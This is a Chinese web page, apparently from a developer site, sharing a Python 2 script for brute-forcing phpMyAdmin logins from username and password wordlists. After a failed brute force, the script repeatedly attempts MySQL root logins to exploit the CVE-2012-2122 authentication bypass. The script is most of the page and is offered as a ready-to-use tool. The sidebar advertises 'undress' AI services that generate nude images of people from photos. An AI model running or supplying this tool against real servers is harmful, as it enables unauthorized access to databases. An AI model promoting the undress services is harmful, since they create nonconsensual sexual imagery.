Python写的PHPMyAdmin暴力破解工具代码
phpmyadmin
python
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。
#!/usr/bin/env python
import urllib
import urllib2
import cookielib
import sys
import subprocess
def Crack(url,username,password):
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
params = urllib.urlencode({'pma_username': username, 'pma_password': password})
request = urllib2.Request(url+"/index.php", params,headers)
response = opener.open(request)
a=response.read()
if a.find('Database server')!=-1 and a.find('name="login_form"')==-1:
return username,password
return 0
def MySQLAuthenticationBypassCheck(host,port):
i=0
while i<300:
i=i+1
subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait()
if __name__ == '__main__':
if len(sys.argv)<4:
print "#author:iswin\n#useage python pma.py http://www.jb51.net/phpmyadmin/ username.txt password.txt"
sys.exit()
print "Bruting,Pleas wait..."
for name in open(sys.argv[2],"r"):
for passw in open(sys.argv[3],"r"):
state=Crack(sys.argv[1],name,passw)
if state!=0:
print "\nBrute successful"
print "UserName: "+state[0]+"PassWord: "+state[1]
sys.exit()
print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck"
choice=raw_input('Warning:This function needs mysql environment.\nY:Try to MySQLAuthenticationBypassCheck\nOthers:Exit\n')
if choice=='Y' or choice=='y':
host=raw_input('Host:')
port=raw_input('Port:')
MySQLAuthenticationBypassCheck(host,port)
登录后复制
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热AI工具
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Undress AI Tool
免费脱衣服图片
Clothoff.io
AI脱衣机
AI Hentai Generator
免费生成ai无尽的。
热门文章
R.E.P.O.能量晶体解释及其做什么(黄色晶体)
2 周前
By 尊渡假赌尊渡假赌尊渡假赌
仓库:如何复兴队友
4 周前
By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒险:如何获得巨型种子
4 周前
By 尊渡假赌尊渡假赌尊渡假赌
击败分裂小说需要多长时间?
3 周前
By DDD
R.E.P.O.保存文件位置:在哪里以及如何保护它?
3 周前
By DDD
热工具
记事本++7.3.1
好用且免费的代码编辑器
SublimeText3汉化版
中文版,非常好用
禅工作室 13.0.1
功能强大的PHP集成开发环境
Dreamweaver CS6
视觉化网页开发工具
SublimeText3 Mac版
神级代码编辑软件(SublimeText3)
如何解决Linux终端中查看Python版本时遇到的权限问题?
Apr 01, 2025 pm 05:09 PM
Linux终端中查看Python版本时遇到权限问题的解决方法当你在Linux终端中尝试查看Python的版本时,输入python...
在Python中如何高效地将一个DataFrame的整列复制到另一个结构不同的DataFrame中?
Apr 01, 2025 pm 11:15 PM
在使用Python的pandas库时,如何在两个结构不同的DataFrame之间进行整列复制是一个常见的问题。假设我们有两个Dat...
Python参数注解可以使用字符串吗?
Apr 01, 2025 pm 08:39 PM
Python参数注解的另类用法在Python编程中,参数注解是一种非常有用的功能,可以帮助开发者更好地理解和使用函...
Python跨平台桌面应用开发:哪个GUI库最适合你?
Apr 01, 2025 pm 05:24 PM
Python跨平台桌面应用开发库的选择许多Python开发者都希望开发出能够在Windows和Linux系统上都能运行的桌面应用程...
为什么我的代码无法获取API返回的数据?如何解决这个问题?
Apr 01, 2025 pm 08:09 PM
为什么我的代码无法获取API返回的数据?在编程中,我们常常会遇到API调用时返回空值的问题,这不仅让人困惑...
Uvicorn是如何在没有serve_forever()的情况下持续监听HTTP请求的?
Apr 01, 2025 pm 10:51 PM
Uvicorn是如何持续监听HTTP请求的?Uvicorn是一个基于ASGI的轻量级Web服务器,其核心功能之一便是监听HTTP请求并进�...
Python脚本如何在特定位置清空输出到光标位置?
Apr 01, 2025 pm 11:30 PM
Python脚本如何在特定位置清空输出到光标位置?在编写Python脚本时,如何清空之前的输出到光标位置是个常见的...
